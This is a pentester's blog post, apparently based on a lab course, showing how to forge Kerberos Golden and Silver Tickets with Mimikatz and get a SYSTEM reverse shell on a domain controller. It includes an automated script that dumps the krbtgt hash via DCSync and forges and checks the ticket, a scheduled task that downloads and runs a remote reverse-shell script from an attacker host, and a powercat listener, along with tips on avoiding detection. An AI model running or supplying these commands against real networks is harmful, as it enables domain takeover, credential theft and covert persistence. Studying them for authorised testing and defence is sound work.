How to get a reverse shell from Golden/Silver Ticket without Metasploit?

MOHNISH DHAGE
4 min read · Jun 5, 2020


A few days ago, I was trying to get a reverse shell on a Windows Server 2016 host after generating a Golden/Silver ticket, but for some reason I was not able to use PSRemoting. I started looking for alternatives and found that a lot of the articles on command execution using a Golden/Silver Ticket used Metasploit, which I didn’t have access to. So I thought of writing this article from the tricks I picked up from the Pentester Academy’s Attacking and Defending AD course.

Golden Ticket

A Golden Ticket is a forged Ticket Granting Ticket (TGT) that is encrypted and signed with the Kerberos key of the krbtgt account; when RC4 is used that key is the account’s NTLM hash, which is what Mimikatz takes as input. Because the KDC accepts any TGT it can decrypt with that key, the forged ticket can be exchanged for service tickets (TGS) for any service in the domain, and it can claim any user and any group membership in its PAC. That is why it is a persistence mechanism: it remains valid until the krbtgt password has been rotated twice, since the KDC also accepts tickets encrypted with the previous krbtgt key.

Once you have the NTLM hash of the krbtgt account (typically obtained with DCSync, i.e. lsadump::dcsync, which needs Domain Admin or replication rights) you can forge the ticket with the following Mimikatz command. Injecting the ticket with /ptt does not require local admin rights: Mimikatz submits it to the Kerberos authentication package of the current logon session through the LSA API; nothing is written into LSASS memory. The privileged step is getting the hash, not using it.

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:somedomainname.local /sid:S-1-5-21-1874506631-3219951593-538509811 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

kerberos::golden — name of the Mimikatz module (the same module forges Silver Tickets, see below)

user — username placed in the ticket. It does not need to be an existing account: the KDC does not validate the account behind a TGT until the ticket is more than 20 minutes old, after which a non-existent or disabled user is rejected. Using a real, privileged-looking name keeps the ticket usable beyond that window and blends into logs.

domain — FQDN of the target domain

sid — domain SID (Get-DomainSID from PowerView, or take any domain account’s SID and strip the trailing RID)

krbtgt — NTLM hash of the krbtgt account

id and groups — RID of the user and RIDs of the groups written into the PAC (optional). Mimikatz defaults to 500 (Administrator) and 513,512,520,518,519 (Domain Users, Domain Admins, Group Policy Creator Owners, Schema Admins, Enterprise Admins).

ptt — inject the ticket into the current logon session; use /ticket:<file> instead to write a .kirbi file for later injection with kerberos::ptt

startoffset — minutes from now until the ticket becomes valid (0 means right now) (optional)

endin — ticket lifetime in minutes (optional). Mimikatz defaults to ten years, which stands out; 600 (10 hours) matches the default domain Kerberos policy.

renewmax — maximum renewable lifetime in minutes (optional). 10080 (7 days) matches the default domain policy, so the forged ticket looks like one the DC would have issued.

To check if the ticket was created, we can use the following command:

klist

Generating Golden Ticket Using Mimikatz
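The following is an added example, not code from the original post or from the course it credits. It collects the three inputs kerberos::golden needs without PowerView, builds the command with the policy-matching lifetimes described above, injects the ticket, and checks that it was both cached and accepted by the KDC. It assumes Invoke-Mimikatz is already loaded in the session, that the session runs as a Domain Admin (needed for the DCSync step only), and that the domain and DC names are the page’s example values; the function names are mine.

```powershell
# Added example (not part of the original post). Assumes Invoke-Mimikatz is loaded
# and that lsadump::dcsync is run from a Domain Admin (or replication-rights) context.
$Domain = 'somedomainname.local'      # page's example domain
$Dc     = 'dc.somedomainname.local'   # page's example DC

# 1. Domain SID straight from the domain object (no PowerView needed).
function Get-CurrentDomainSid {
    $de  = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().GetDirectoryEntry()
    $raw = [byte[]]$de.Properties['objectSid'].Value
    return (New-Object System.Security.Principal.SecurityIdentifier($raw, 0)).Value   # S-1-5-21-...
}

# 2. krbtgt NTLM hash via DCSync (directory replication), not via the DC's LSASS.
function Get-KrbtgtHash {
    param([string]$Domain)
    $out = Invoke-Mimikatz -Command "`"lsadump::dcsync /domain:$Domain /user:krbtgt`"" | Out-String
    $m = [regex]::Match($out, 'Hash NTLM:\s*([0-9a-fA-F]{32})')
    if (-not $m.Success) { throw 'DCSync returned no NTLM hash (replication rights required)' }
    return $m.Groups[1].Value.ToLower()
}

# 3. Build the kerberos::golden command. Lifetimes default to the domain policy
#    defaults (10 h ticket, 7 d renewal) instead of Mimikatz's ten-year default.
#    -SaveTo writes a .kirbi for later kerberos::ptt instead of injecting now.
function New-GoldenTicketCommand {
    param(
        [Parameter(Mandatory)][string]$Domain,
        [Parameter(Mandatory)][string]$Sid,
        [Parameter(Mandatory)][string]$KrbtgtHash,
        [string]$User = 'Administrator',
        [int]$Id = 500,
        [int[]]$Groups = @(513, 512, 520, 518, 519),
        [int]$EndIn = 600,
        [int]$RenewMax = 10080,
        [string]$SaveTo
    )
    $parts = @('kerberos::golden', "/user:$User", "/domain:$Domain", "/sid:$Sid",
               "/krbtgt:$KrbtgtHash", "/id:$Id", "/groups:$($Groups -join ',')",
               '/startoffset:0', "/endin:$EndIn", "/renewmax:$RenewMax")
    $parts += if ($SaveTo) { "/ticket:$SaveTo" } else { '/ptt' }
    return '"' + ($parts -join ' ') + '"'          # Invoke-Mimikatz wants the inner quotes
}

# 4. Verify: the TGT must appear in the session cache (klist), and touching the DC's
#    admin share forces a TGS request, which proves the KDC accepts the forged TGT.
function Test-GoldenTicket {
    param([string]$Dc)
    $cached  = ((klist | Out-String) -match 'krbtgt/')
    $usable  = Test-Path "\\$Dc\C$"
    return [pscustomobject]@{ TgtInCache = $cached; DcAdminShare = $usable }
}

$sid  = Get-CurrentDomainSid
$hash = Get-KrbtgtHash -Domain $Domain
Invoke-Mimikatz -Command (New-GoldenTicketCommand -Domain $Domain -Sid $sid -KrbtgtHash $hash)
Test-GoldenTicket -Dc $Dc
```

If TgtInCache is true but DcAdminShare is false, the usual causes are a wrong domain SID, a krbtgt hash from a different domain, or a ticket forged with a user name that does not exist and is now past the 20-minute window. Rerun the command with a real account name or purge with klist purge and start again.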

Silver Ticket

A Silver Ticket, on the other hand, is a forged service ticket (TGS) encrypted with the key of the service account that runs the target service; for a service on a Windows host such as HOST or CIFS that is the computer account, and with RC4 the key is its NTLM hash. A Silver Ticket is only valid for the service whose key it was encrypted with, so it grants narrower access than a Golden Ticket. In exchange it is much quieter: the ticket is presented directly to the service and never touches the DC, so there is no TGT or TGS request for the KDC to log (no 4768/4769 events on the DC), only the logon events on the target itself.

Once we have the NTLM hash of the target service account (for the HOST service on a DC this is the DC’s computer account, obtainable with DCSync or from the DC’s LSASS) we can forge the Silver Ticket with the following command:

Invoke-Mimikatz -Command '"kerberos::golden /domain:somedomainname.local /sid:S-1-5-21-1874506631-3219951593-538509811 /target:dc.somedomainname.local /service:HOST /rc4:731a06658bc10b59d71f5776e93e5689 /user:Administrator /ptt"'

The Mimikatz module used here is still kerberos::golden, there is no silver module.

target — FQDN of the host that runs the service

service — service class of the SPN the ticket is for (HOST, CIFS, HTTP, LDAP, ...); together with /target it forms the SPN, here HOST/dc.somedomainname.local

rc4 — NTLM hash of the account that runs the target service

Note: the scheduled-task technique below needs a service ticket for the HOST service class, because remote Task Scheduler access on the target is covered by HOST. A CIFS ticket, for example, would let you read the file system but not create the task.

Generating Silver Ticket Using Mimikatz

Getting a Reverse Shell

Step 1: Schedule a weekly task to fetch reverse shell script.

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "ABC" /TR "powershell.exe -c 'iex (iwr http://172.16.100.14/Invoke-PowerShellTcp.ps1 -UseBasicParsing)'"

Note: Invoke-PowerShellTcp.ps1 only defines the function, so append a call to the end of the hosted copy, with the IP and port of your listener (for the listener in Step 2 that is Invoke-PowerShellTcp -Reverse -IPAddress 172.16.100.14 -Port 443; the port must match the one the listener binds). Make sure the file is actually being served over HTTP from a host the target can reach; -UseBasicParsing lets iwr work on a server where Internet Explorer first-run setup has never been completed. Also bear in mind that the stock Nishang script is well known to Defender/AMSI, so on a target with active AV the download may succeed but execution may be blocked.

S — name of the remote computer on which the task is to be created

SC — schedule type (Weekly here is only a placeholder; the task is triggered by hand in Step 3)

RU — account the task runs as (NT Authority\SYSTEM gives a SYSTEM shell on the DC)

TN — name of the task; reuse the same name in Step 3 and when deleting the task afterwards

TR — command line the task executes when it runs

Scheduling a task using schtasks

Step 2: Start a listener

powercat -l -p 443 -v -t 1000

l — listen mode

p — port to listen on (must match the port in the callback line appended to the hosted script)

v — verbose output

t — timeout in seconds to wait for the connection

Starting Powercat Listener

Step 3: Run the scheduled task.

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "ABC"

Running Scheduled Task

Big thanks to Pentester Academy for letting me use their AD labs. I hope you found this article helpful. That’s all folks happy hunting!
